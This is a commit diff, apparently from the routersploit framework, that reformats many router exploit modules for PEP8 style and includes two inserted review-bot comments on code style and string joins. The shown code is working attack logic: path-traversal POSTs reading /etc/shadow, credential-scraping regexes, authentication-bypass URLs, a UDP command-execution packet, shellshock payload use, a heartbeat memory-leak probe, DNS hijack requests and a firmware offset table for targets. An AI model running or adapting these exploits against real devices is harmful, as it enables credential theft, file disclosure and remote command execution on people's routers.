Commit 350f1212 by fwkz

Fixing PEP8 violations.

parent 73e8b5cd
......@@ -42,7 +42,7 @@ class Exploit(exploits.Exploit):
print_status("Sending read {} file request".format(self.filename))
url = "{}:{}/goform/enhAuthHandler".format(self.target, self.port)
headers = {u"Content-Type": u"application/x-www-form-urlencoded"}
data = {"__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../..{}".format(self.filename),
......
......@@ -49,7 +49,7 @@ class Exploit(exploits.Exploit):
# checking if the target is valid
url = "{}:{}/".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
......@@ -59,7 +59,7 @@ class Exploit(exploits.Exploit):
# checking if authentication can be bypassed
url = "{}:{}/xslt".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
......
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com 3CRADSL72 Info Disclosure',
'description': 'Exploits 3Com 3CRADSL72 information disclosure vulnerability that allows to fetch credentials for SQL sa account',
'description': 'Exploits 3Com 3CRADSL72 information disclosure vulnerability '
'that allows to fetch credentials for SQL sa account',
'authors': [
'Karb0nOxyde <karb0noxyde[at]gmail.com>', # vulnerability discovery
'Ivan Casado Ruiz <casadoi[at]yahoo.co.uk>', # vulnerability discovery
......@@ -28,7 +29,7 @@ class Exploit(exploits.Exploit):
'http://www.securityfocus.com/bid/11408/exploit',
],
'devices': [
'3Com 3CRADSL72',
'3Com 3CRADSL72',
],
}
......
......@@ -48,7 +48,7 @@ class Exploit(exploits.Exploit):
print_status("Extracting credentials")
username = re.findall('<input type="text" name="szUsername" size=16 value="(.+?)">', response.text)
password = re.findall('<input type="password" name="szPassword" size=16 maxlength="16" value="(.+?)">', response.text)
if len(username) and len(password):
print_success("Exploit success")
creds.append((username[0], password[0]))
......
......@@ -26,7 +26,7 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/12680/',
],
'devices': [
'3Com Intelligent Management Center',
'3Com Intelligent Management Center',
],
}
......
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com IMC Path Traversal',
'description': 'Exploits 3Com Intelligent Management Center path traversal vulnerability. If the target is vulnerable it is possible to read file from the filesystem.',
'description': 'Exploits 3Com Intelligent Management Center path traversal vulnerability. '
'If the target is vulnerable it is possible to read file from the filesystem.',
'authors': [
'Richard Brain', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -26,7 +27,7 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/12679/',
],
'devices': [
'3Com Intelligent Management Center',
'3Com Intelligent Management Center',
],
}
......@@ -34,7 +35,6 @@ class Exploit(exploits.Exploit):
port = exploits.Option(8080, 'Target port') # default port
filename = exploits.Option('\\windows\\win.ini', 'File to read from the filesystem')
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
......
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': '3Com OfficeConnect Info Disclosure',
'description': 'Exploits 3Com OfficeConnect information disclosure vulnerability. If the target is vulnerable it is possible to read sensitive information.',
'description': 'Exploits 3Com OfficeConnect information disclosure vulnerability. '
'If the target is vulnerable it is possible to read sensitive information.',
'authors': [
'Luca Carettoni <luca.carettoni[at]ikkisoft.com>', # vulnerablity discovery
'iDefense', # vulnerability discovery
......@@ -28,7 +29,7 @@ class Exploit(exploits.Exploit):
'http://seclists.org/vulnwatch/2005/q1/42',
],
'devices': [
'3Com OfficeConnect',
'3Com OfficeConnect',
],
}
......@@ -59,13 +60,13 @@ class Exploit(exploits.Exploit):
@mute
def check(self):
for resource in self.resources:
for resource in self.resources:
url = "{}:{}{}".format(self.target, self.port, resource)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if "pppoe_username" in response.text and "pppoe_password" in response.text:
self.valid = resource
return True # target is vulnerable
......
......@@ -23,10 +23,10 @@ class Exploit(exploits.Exploit):
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt',
'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt',
],
'devices': [
'Asmax AR 1004g',
'Asmax AR 1004g',
],
}
......
......@@ -70,7 +70,7 @@ class Exploit(exploits.Exploit):
sock.bind(('0.0.0.0', 9999))
sock.settimeout(2)
packet = (b'\x0C\x15\x33\x00'+ os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
try:
sock.sendto(packet, (self.target, 9999))
......@@ -86,7 +86,7 @@ class Exploit(exploits.Exploit):
if len(data) == 512 and data[1] == "\x16":
break
length = struct.unpack('<H', data[14:16])[0]
output = data[16:16+length]
output = data[16:16 + length]
sock.close()
return output
......
......@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Belkin G Info Disclosure',
'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure vulnerability which allows fetching sensitive information such as credentials.',
'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure '
'vulnerability which allows fetching sensitive information such as credentials.',
'authors': [
'DarkFig', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -42,15 +43,17 @@ class Exploit(exploits.Exploit):
if response is None:
return
var = ['pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
var = [
'pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd'
]
data = []
for v in var:
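Review bot: The nine-entry `var` list rewritten in this hunk is repeated verbatim in the next hunk of the same file (the one feeding `if any(map(lambda x: x in response.text, var)):`), so a key added to one copy can be missed in the other. Since both literals are being re-laid-out anyway, define the list once at class level, e.g. `config_keys = ['pppoe_username', ...]`, and read it in both places with `for v in self.config_keys:`. Both enclosing methods start and end outside the hunks, so only the list itself can be judged from here.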
......@@ -76,15 +79,17 @@ class Exploit(exploits.Exploit):
if response is None:
return False # target is not vulnerable
var = ['pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
var = [
'pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd'
]
if any(map(lambda x: x in response.text, var)):
return True # target vulnerable
......
......@@ -58,4 +58,3 @@ class Exploit(exploits.Exploit):
return True # target is vulnerable
return False # target is not vulnerable
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Cisco UCM Info Disclosure',
'description': 'Module exploits information disclosure vulnerability in Cisco UCM devices. If the target is vulnerable it is possible to read sensitive information through TFTP service.',
'description': 'Module exploits information disclosure vulnerability in Cisco UCM devices. '
'If the target is vulnerable it is possible to read sensitive information through TFTP service.',
'authors': [
'Daniel Svartman <danielsvartman[at]gmail.com', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -72,4 +73,3 @@ class Exploit(exploits.Exploit):
return True # target is vulnerable
return False # target is not vulnerable
......@@ -19,7 +19,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Cisco UCS Manager RCE',
'description': 'Module exploits Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability which allows executing commands on operating system level.',
'description': 'Module exploits Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability which '
'allows executing commands on operating system level.',
'authors': [
'thatchriseckert', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -84,4 +85,3 @@ class Exploit(exploits.Exploit):
return True
return False
......@@ -10,7 +10,7 @@ from routersploit import (
http_request,
mute,
validators,
)
)
class Exploit(exploits.Exploit):
......@@ -23,13 +23,13 @@ class Exploit(exploits.Exploit):
'description': 'WiFi router Comtrend CT 5361T suffers from a Password Disclosure Vulnerability',
'authors': [
'TUNISIAN CYBER', # routersploit module
],
],
'references': [
'https://packetstormsecurity.com/files/126129/Comtrend-CT-5361T-Password-Disclosure.html'
],
],
'devices': [
'Comtrend CT 5361T (more likely CT 536X)',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
......
......@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'D-Link DIR-300 & DIR-320 & DIR-600 & DIR-615 Info Disclosure',
'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600, DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600,'
'DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
'authors': [
'tytusromekiatomek <tytusromekiatomek[at]inbox.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
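Review bot: Splitting the `'description'` value into two adjacent literals drops the space at the join: the first literal ends in `DIR-600,` and the second starts with `DIR-615`, so the concatenated string now reads "DIR-600,DIR-615 devices". End the first literal with a trailing space, `'... DIR-320, DIR-600, '`, as the 3Com and Belkin description splits in this commit already do. The same join defect is in the later description splits for the D-Link Auth Bypass module (`DIR-615` + `revD`), Huawei HG520 (`vulnerablity.` + `If`), IPFire Shellshock (`Update 82.` + `If`) and Linksys WAP54Gv3 (both joins). The `__info__` dict continues outside the hunk.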
......@@ -63,7 +64,7 @@ class Exploit(exploits.Exploit):
return False # target is not vulnerable
creds = re.findall("\n\t\t\t(.+?):(.+?)\n\n\t\t\t", response.text)
if len(creds):
return True # target is vulnerable
......
......@@ -15,7 +15,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615'
'revD devices. It is possible to access administration panel without providing password.',
'authors': [
'Craig Heffner', # vulnerability discovery
'Karol Celin', # vulnerability discovery
......@@ -58,7 +59,7 @@ class Exploit(exploits.Exploit):
# checking if authentication can be baypassed
url = "{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
......
......@@ -19,7 +19,7 @@ class Exploit(exploits.Exploit):
'name': 'D-Link DIR-645 & DIR-815 RCE',
'description': 'Module exploits D-Link DIR-645 and DIR-815 Remote Code Execution vulnerability which allows executing command on the device.',
'authors': [
'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery
'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
......
......@@ -38,7 +38,6 @@ class Exploit(exploits.Exploit):
dns1 = exploits.Option('8.8.8.8', 'Primary DNS Server')
dns2 = exploits.Option('8.8.4.4', 'Seconary DNS Server')
def run(self):
url = "{}:{}/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=".format(self.target,
self.port,
......
......@@ -66,7 +66,18 @@ class Exploit(exploits.Exploit):
def check(self):
# address and parameters
url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../../etc/shadow", "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "blah", "%3Apassword": "blah","%3Aaction": "login","%3Asessionid": "abcdefgh"}
data = {
"getpage": "html/index.html",
"*errorpage*": "../../../../../../../../../../../etc/shadow",
"var%3Amenu": "setup",
"var%3Apage": "connected",
"var%": "",
"objaction": "auth",
"%3Ausername": "blah",
"%3Apassword": "blah",
"%3Aaction": "login",
"%3Asessionid": "abcdefgh"
}
# connection
response = http_request(method="POST", url=url, data=data)
......@@ -77,4 +88,3 @@ class Exploit(exploits.Exploit):
return True # target vulnerable
return False # target not vulnerable
......@@ -49,7 +49,7 @@ class Exploit(exploits.Exploit):
regexp = "<{}>(.+?)</{}>".format(option, option)
value = re.findall(regexp, response.text)
if value:
res.append((option, value[0]))
res.append((option, value[0]))
if len(res):
print_success("Found sensitive information!")
......
......@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Huawei HG520 Information Disclosure',
'description': 'Module exploits Huawei EchoLife HG520 information disclosure vulnerablity. If the target is vulnerable it is possible to retrieve sensitive information.',
'description': 'Module exploits Huawei EchoLife HG520 information disclosure vulnerablity.'
'If the target is vulnerable it is possible to retrieve sensitive information.',
'authors': [
'hkm', # vulnerablity discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -70,7 +71,7 @@ class Exploit(exploits.Exploit):
def run(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
print_status("Sending exploit payload")
sock.sendto(self.payload, (self.target, 43690))
......@@ -95,7 +96,7 @@ class Exploit(exploits.Exploit):
response = sock.recv(1024)
except:
return False # target is not vulnerable
if len(response):
return True # target is vulnerable
......
......@@ -48,7 +48,7 @@ class Exploit(exploits.Exploit):
if response.status_code == 200:
print_success("Administrator's password has been changed to {}".format(self.password))
else:
print_error("Exploit failed - could not change password")
print_error("Exploit failed - could not change password")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......
......@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'IPFire Shellshock',
'description': 'Exploits shellshock vulnerability in IPFire M= 2.15 Core Update 82. If the target is vulnerable it is possible to execute commands on operating system level.',
'description': 'Exploits shellshock vulnerability in IPFire M= 2.15 Core Update 82.'
'If the target is vulnerable it is possible to execute commands on operating system level.',
'authors': [
'Claudio Viviani', # vulnerability discovery
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
......@@ -27,7 +28,7 @@ class Exploit(exploits.Exploit):
'https://www.exploit-db.com/exploits/34839',
],
'devices': [
'IPFire <= 2.15 Core Update 82',
'IPFire <= 2.15 Core Update 82',
],
}
......@@ -72,7 +73,7 @@ class Exploit(exploits.Exploit):
return ""
if response.status_code == 200:
start = response.text.find(marker) + len(marker) + 1 # marker and whitespace
start = response.text.find(marker) + len(marker) + 1 # marker and whitespace
end = response.text.find(marker, start) - 48
return response.text[start:end]
......@@ -86,7 +87,7 @@ class Exploit(exploits.Exploit):
marker = random_text(32)
cmd = "echo {}".format(marker)
payload = self.payload.replace("{{cmd}}", cmd)
headers = {
'VULN': payload,
}
......
......@@ -19,7 +19,9 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Linksys WAP54Gv3',
'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices. Debug interface allows executing root privileged shell commands is available on dedicated web pages on the device.',
'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices.'
'Debug interface allows executing root privileged shell commands is available'
'on dedicated web pages on the device.',
'authors': [
'Phil Purviance', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -64,7 +66,7 @@ class Exploit(exploits.Exploit):
if len(res):
return res[0]
return ""
@mute
......
......@@ -53,10 +53,10 @@ class Exploit(exploits.Exploit):
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
00 0f 00 01 01
'''
hb = '''
hb = '''
18 03 02 00 03
01 40 00
'''
......@@ -66,9 +66,9 @@ class Exploit(exploits.Exploit):
def hexdump(self, s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
lin = [c for c in s[b: b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
......@@ -77,7 +77,7 @@ class Exploit(exploits.Exploit):
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
......@@ -92,7 +92,7 @@ class Exploit(exploits.Exploit):
rdata += data
remain -= len(data)
return rdata
return rdata
def recvmsg(self, s):
hdr = self.recvall(s, 5)
......@@ -139,11 +139,11 @@ class Exploit(exploits.Exploit):
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
if typ is None:
print_error("Server closed connection without sending Server Hello.")
print_error("Exploit failed")
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
......@@ -163,7 +163,7 @@ class Exploit(exploits.Exploit):
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
if typ is None:
return False # target is not vulnerable
if typ == 22 and ord(pay[0]) == 0x0E:
......
......@@ -30,92 +30,92 @@ class Exploit(exploits.Exploit):
],
'devices': [
# brand # model # firmware
{'name': "Azmoon AZ-D140W 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1", 'number': 107367693, 'offset': 13}, # 0x803D5A79 # tested
{'name': "Billion BiPAC 5102S Av2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13}, # 0x8032204d # ----------
{'name': "Billion BiPAC 5102S Bv2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13}, # 0x8032204d # ----------
{'name': "Billion BiPAC 5200 2.11.84.0(UE2.C2)3.11.11.6", 'number': 107369545, 'offset': 9}, # 0x803ec2ad # ----------
{'name': "Billion BiPAC 5200 2_11_62_2_ UE0.C2D_3_10_16_0", 'number': 107371218, 'offset': 21}, # 0x803c53e5 # ----------
{'name': "Billion BiPAC 5200A 2_10_5 _0(RE0.C2)3_6_0_0", 'number': 107366366, 'offset': 25}, # 0x8038a6e1 # ----------
{'name': "Billion BiPAC 5200A 2_11_38_0 (RE0.C29)3_10_5_0", 'number': 107371453, 'offset': 9}, # 0x803b3a51 # ----------
{'name': "Billion BiPAC 5200GR4 2.11.91.0(RE2.C29)3.11.11.52", 'number': 107367690, 'offset': 21}, # 0x803D8A51 # tested
{'name': "Billion BiPAC 5200SRD 2.10.5.0 (UE0.C2C) 3.6.0.0", 'number': 107368270, 'offset': 1}, # 0x8034b109 # ----------
{'name': "Billion BiPAC 5200SRD 2.12.17.0_UE2.C3_3.12.17.0", 'number': 107371378, 'offset': 37}, # 0x8040587d # ----------
{'name': "Billion BiPAC 5200SRD 2_11_62_2(UE0.C3D)3_11_11_22", 'number': 107371218, 'offset': 13}, # 0x803c49d5 # ----------
{'name': "D-Link DSL-2520U Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL", 'number': 107368902, 'offset': 25}, # 0x803fea01 # tested
{'name': "D-Link DSL-2600U Z1_DSL-2600U", 'number': 107366496, 'offset': 13}, # 0x8040637d # ----------
{'name': "D-Link DSL-2600U Z2_V1.08_ras", 'number': 107360133, 'offset': 20}, # 0x803389B0 # ----------
{'name': "TP-Link TD-8616 V2_080513", 'number': 107371483, 'offset': 21}, # 0x80397055 # ----------
{'name': "TP-Link TD-8816 V4_100528_Russia", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V4_100524", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100528_Russia", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100524", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # tested
{'name': "TP-Link TD-8816 V5_100903", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V6_100907", 'number': 107371426, 'offset': 17}, # 0x803c6e09 # ----------
{'name': "TP-Link TD-8816 V7_111103", 'number': 107371161, 'offset': 1}, # 0x803e1bd5 # ----------
{'name': "TP-Link TD-8816 V7_130204", 'number': 107370211, 'offset': 5}, # 0x80400c85 # ----------
{'name': "TP-Link TD-8817 V5_100524", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100702_TR", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100903", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V6_100907", 'number': 107369788, 'offset': 1}, # 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V6_101221", 'number': 107369788, 'offset': 1}, # 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V7_110826", 'number': 107369522, 'offset': 25}, # 0x803d1bd5 # ----------
{'name': "TP-Link TD-8817 V7_130217", 'number': 107369316, 'offset': 21}, # 0x80407625 # ----------
{'name': "TP-Link TD-8817 V7_120509", 'number': 107369321, 'offset': 9}, # 0x803fbcc5 # tested
{'name': "TP-Link TD-8817 V8_140311", 'number': 107351277, 'offset': 20}, # 0x8024E148 # tested
{'name': "TP-Link TD-8820 V3_091223", 'number': 107369768, 'offset': 17}, # 0x80397E69 # tested
{'name': "TP-Link TD-8840T V1_080520", 'number': 107369845, 'offset': 5}, # 0x80387055 # ----------
{'name': "TP-Link TD-8840T V2_100525", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # tested
{'name': "TP-Link TD-8840T V2_100702_TR", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8840T V2_090609", 'number': 107369570, 'offset': 1}, # 0x803c65d5 # ----------
{'name': "TP-Link TD-8840T V3_101208", 'number': 107369766, 'offset': 17}, #0x803c3e89 # tested
{'name': "TP-Link TD-8840T V3_110221", 'number': 107369764, 'offset': 5}, # 0x803d1a09 # ----------
{'name': "TP-Link TD-8840T V3_120531", 'number': 107369688, 'offset': 17}, # 0x803fed35 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367772, 'offset': 37}, # 0x803bf701 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367808, 'offset': 21}, # 0x803e5b6d # ----------
{'name': "TP-Link TD-W8101G V2_100819", 'number': 107367751, 'offset': 21}, # 0x803dc701 # ----------
{'name': "TP-Link TD-W8101G V2_101015_TR", 'number': 107367749, 'offset': 13}, # 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V2_101101", 'number': 107367749, 'offset': 13}, # 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V3_110119", 'number': 107367765, 'offset': 25}, # 0x804bb941 # ----------
{'name': "TP-Link TD-W8101G V3_120213", 'number': 107367052, 'offset': 25}, # 0x804e1ff9 # ----------
{'name': "TP-Link TD-W8101G V3_120604", 'number': 107365835, 'offset': 1}, # 0x804f16a9 # ----------
{'name': "TP-Link TD-W8151N V3_120530", 'number': 107353867, 'offset': 24}, # 0x8034F3A4 # tested
{'name': "TP-Link TD-W8901G V1_080522", 'number': 107367787, 'offset': 21}, # 0x803AB30D # tested
{'name': "TP-Link TD-W8901G V1,2_080522", 'number': 107368013, 'offset': 5}, # 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V2_090113_Turkish", 'number': 107368013, 'offset': 5}, # 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V3_140512", 'number': 107367854, 'offset': 9}, # 0x803cf335 # tested
{'name': "TP-Link TD-W8901G V3_100603", 'number': 107367751, 'offset': 21}, # 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100702_TR", 'number': 107367751, 'offset': 21}, # 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100901", 'number': 107367749, 'offset': 13}, # 0x803E1829 # tested
{'name': "TP-Link TD-W8901G V6_110119", 'number': 107367765, 'offset': 25}, # 0x804BB941 # tested
{'name': "TP-Link TD-W8901G V6_110915", 'number': 107367682, 'offset': 21}, # 0x804D7CB9 # tested
{'name': "TP-Link TD-W8901G V6_120418", 'number': 107365835, 'offset': 1}, # 0x804F16A9 # ----------
{'name': "TP-Link TD-W8901G V6_120213", 'number': 107367052, 'offset': 25}, # 0x804E1FF9 # ----------
{'name': "TP-Link TD-W8901GB V3_100727", 'number': 107367756, 'offset': 13}, # 0x803dfbe9 # ----------
{'name': "TP-Link TD-W8901GB V3_100820", 'number': 107369393, 'offset': 21}, # 0x803f1719 # ----------
{'name': "TP-Link TD-W8901N V1_111211", 'number': 107353880, 'offset': 0}, # 0x8034FF94 # tested
{'name': "TP-Link TD-W8951ND V1_101124,100723,100728", 'number': 107369839, 'offset': 25}, # 0x803d2d61 # tested
{'name': "TP-Link TD-W8951ND V1_110907", 'number': 107369876, 'offset': 13}, # 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V1_111125", 'number': 107369876, 'offset': 13}, # 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V3.0_110729_FI", 'number': 107366743, 'offset': 21}, # 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V3_110721", 'number': 107366743, 'offset': 21}, # 0x804ee049 # ----------
{'name': "TP-Link TD-W8951ND V3_20110729_FI", 'number': 107366743, 'offset': 21}, # 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V4_120511", 'number': 107364759, 'offset': 25}, # 0x80523979 # tested
{'name': "TP-Link TD-W8951ND V4_120607", 'number': 107364759, 'offset': 13}, # 0x80524A91 # tested
{'name': "TP-Link TD-W8951ND V4_120912_FL", 'number': 107364760, 'offset': 21}, # 0x80523859 # tested
{'name': "TP-Link TD-W8961NB V1_110107", 'number': 107369844, 'offset': 17}, # 0x803de3f1 # tested
{'name': "TP-Link TD-W8961NB V1_110519", 'number': 107369844, 'offset': 17}, # 0x803de3f1 # ----------
{'name': "TP-Link TD-W8961NB V2_120319", 'number': 107367629, 'offset': 21}, # 0x80531859 # ----------
{'name': "TP-Link TD-W8961NB V2_120823", 'number': 107366421, 'offset': 13}, # 0x80542e59 # ----------
{'name': "TP-Link TD-W8961ND V1_100722,101122", 'number': 107369839, 'offset': 25}, # 0x803D2D61 # tested
{'name': "TP-Link TD-W8961ND V1_101022_TR", 'number': 107369839, 'offset': 25}, # 0x803D2D61 # ----------
{'name': "TP-Link TD-W8961ND V1_111125", 'number': 107369876, 'offset': 13}, # 0x803D6EF9 # ----------
{'name': "TP-Link TD-W8961ND V2_120427", 'number': 107364732, 'offset': 25}, # 0x8052e0e9 # ----------
{'name': "TP-Link TD-W8961ND V2_120710_UK", 'number': 107364771, 'offset': 37}, # 0x80523AA9 # ----------
{'name': "TP-Link TD-W8961ND V2_120723_FI", 'number': 107364762, 'offset': 29}, # 0x8052B6B1 # ----------
{'name': "TP-Link TD-W8961ND V3_120524,120808", 'number': 107353880, 'offset': 0}, # 0x803605B4 # ----------
{'name': "TP-Link TD-W8961ND V3_120830", 'number': 107353414, 'offset': 36}, # 0x803605B4 # ----------
{'name': "ZyXEL P-660R-T3 3.40(BOQ.0)C0", 'number': 107369567, 'offset': 21}, # 0x803db071 # tested
{'name': "ZyXEL P-660RU-T3 3.40(BJR.0)C0", 'number': 107369567, 'offset': 21}, # 0x803db071
{'name': "Azmoon AZ-D140W 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1", 'number': 107367693, 'offset': 13}, # 0x803D5A79 # tested
{'name': "Billion BiPAC 5102S Av2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13}, # 0x8032204d # ----------
{'name': "Billion BiPAC 5102S Bv2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13}, # 0x8032204d # ----------
{'name': "Billion BiPAC 5200 2.11.84.0(UE2.C2)3.11.11.6", 'number': 107369545, 'offset': 9}, # 0x803ec2ad # ----------
{'name': "Billion BiPAC 5200 2_11_62_2_ UE0.C2D_3_10_16_0", 'number': 107371218, 'offset': 21}, # 0x803c53e5 # ----------
{'name': "Billion BiPAC 5200A 2_10_5 _0(RE0.C2)3_6_0_0", 'number': 107366366, 'offset': 25}, # 0x8038a6e1 # ----------
{'name': "Billion BiPAC 5200A 2_11_38_0 (RE0.C29)3_10_5_0", 'number': 107371453, 'offset': 9}, # 0x803b3a51 # ----------
{'name': "Billion BiPAC 5200GR4 2.11.91.0(RE2.C29)3.11.11.52", 'number': 107367690, 'offset': 21}, # 0x803D8A51 # tested
{'name': "Billion BiPAC 5200SRD 2.10.5.0 (UE0.C2C) 3.6.0.0", 'number': 107368270, 'offset': 1}, # 0x8034b109 # ----------
{'name': "Billion BiPAC 5200SRD 2.12.17.0_UE2.C3_3.12.17.0", 'number': 107371378, 'offset': 37}, # 0x8040587d # ----------
{'name': "Billion BiPAC 5200SRD 2_11_62_2(UE0.C3D)3_11_11_22", 'number': 107371218, 'offset': 13}, # 0x803c49d5 # ----------
{'name': "D-Link DSL-2520U Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL", 'number': 107368902, 'offset': 25}, # 0x803fea01 # tested
{'name': "D-Link DSL-2600U Z1_DSL-2600U", 'number': 107366496, 'offset': 13}, # 0x8040637d # ----------
{'name': "D-Link DSL-2600U Z2_V1.08_ras", 'number': 107360133, 'offset': 20}, # 0x803389B0 # ----------
